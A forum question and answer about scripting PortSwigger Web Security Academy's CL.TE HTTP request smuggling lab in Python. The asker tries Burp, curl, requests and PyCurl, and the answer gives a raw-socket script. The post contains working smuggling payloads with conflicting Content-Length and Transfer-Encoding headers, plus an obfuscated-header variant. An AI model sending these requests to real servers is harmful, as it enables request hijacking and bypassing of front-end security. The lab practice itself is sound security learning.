Python script for a POST body containing CRLF characters and malformed headers (HTTP request smuggling)

Published 2024-10-04 05:31:20


Recently I have been working through PortSwigger's Web Security Academy HTTP request smuggling labs, and as an extra challenge I have been writing Python scripts to complete them.

Expected solution in Burp Repeater:

POST / HTTP/1.1
Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 8
Transfer-Encoding: chunked

0

G 

If I right-click and choose "Copy as curl command":

curl -i -s -k -X $'POST' \
    -H $'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 8' \
    --data-binary $'0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \
    $'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'

When I try to run this with curl, it returns a 500 Internal Server Error.

I have managed to do this with the Python requests module:

import requests

def POST_CLTE():
    url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
    # Both framing headers are set by hand; the body below is exactly 8 bytes.
    headers = {'Host': 'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net', 'Connection': 'keep-alive',
               'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '8', 'Transfer-Encoding': 'chunked'}

    # "0" CRLF CRLF "G" CRLF
    data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'

    s = requests.Session()
    r = requests.Request('POST', url, headers=headers, data=data)
    prepared = r.prepare()
    response = s.send(prepared)

    print(response.request.headers)
    print(response.status_code)
    print(response.text)

But I don't like this: I have to pass the headers in as a dict, and it complains when I want to include an obfuscated header, for example:

X: X[\n]Transfer-Encoding: chunked

I have tried to replicate the request with PyCurl:

#!/usr/bin/python3

import pycurl
from io import BytesIO  # Python 3 replacement for StringIO; libcurl writes bytes

buffer = BytesIO()
c = pycurl.Curl()
c.setopt(c.POST, 1)
c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/')
c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a')
#c.setopt(pycurl.POSTFIELDSIZE, 8)
c.setopt(c.HTTPHEADER, [
    'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',
    'Content-Length: 8',
    'Transfer-Encoding: chunked',
    'Content-Type: application/x-www-form-urlencoded'
    ])
#c.setopt(c.CRLF, 1)
c.setopt(c.VERBOSE, 1)
c.setopt(c.HEADER, 1)  # include the response headers in the captured output
c.setopt(c.WRITEDATA, buffer)
c.perform()
c.close()

body = buffer.getvalue()

print(body.decode('utf-8', errors='replace'))

I like passing the headers as an array of strings, but unfortunately I still get a 500 Internal Server Error:

*   Trying 18.200.141.238:443...
* TCP_NODELAY set
* Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)
* found 387 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
*        server certificate verification OK
*        server certificate status verification SKIPPED
*        common name: web-security-academy.net (matched)
*        server certificate expiration date OK
*        server certificate activation date OK
*        certificate public key: RSA
*        certificate version: #3
*        subject: CN=web-security-academy.net
*        start date: Fri, 05 Jul 2019 00:00:00 GMT
*        expire date: Wed, 05 Aug 2020 12:00:00 GMT
*        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon
* ALPN, server did not agree to a protocol
> POST / HTTP/1.1
Host: ac561fd21ed819768081009200f2002e.web-security-academy.net
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 
Content-Length: 8
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded

8
* upload completely sent off: 15 out of 8 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 Internal Server Error
< Content-Type: application/json; charset=utf-8
< Connection: close
< Content-Length: 23
< 
* Closing connection 0
HTTP/1.1 500 Internal Server Error
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 23

"Internal Server Error"

What is the reason for this behaviour? Are there other options I haven't explored? Any suggestions would be greatly appreciated.


1 answer
User
#1 · Posted 2024-10-04 05:31:20

The socket module worked great for me. I feel a bit silly for not trying that from the start, but I learned a lot.

Code:

import socket
import ssl

host = 'lab-id.web-security-academy.net'
port = 443
message = "POST / HTTP/1.1\r\n"
hostHeader = "Host: lab-id.web-security-academy.net\r\n"
contentLength = "Content-Length: 8\r\n"
transferEncoding = "Transfer-Encoding: chunked\r\n"
contentType = "Content-Type: application/x-www-form-urlencoded\r\n"  # was mistyped as x-www-urlencoded
requestBody = "0\r\n\r\nG\r\n"  # exactly 8 bytes, matching Content-Length

# Nothing is normalised here: the bytes go out exactly as assembled.
finalMessage = message + hostHeader + contentLength + transferEncoding + contentType + "\r\n" + requestBody

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# ssl.wrap_socket() is deprecated (removed in Python 3.12); use a context and pass
# server_hostname so SNI and certificate verification work.
context = ssl.create_default_context()
sslWrappedSock = context.wrap_socket(sock, server_hostname=host)

sslWrappedSock.connect((host, port))
sslWrappedSock.sendall(finalMessage.encode('ascii'))  # sockets take bytes, not str

print(sslWrappedSock.recv(1024).decode('utf-8', errors='replace'))

sslWrappedSock.close()
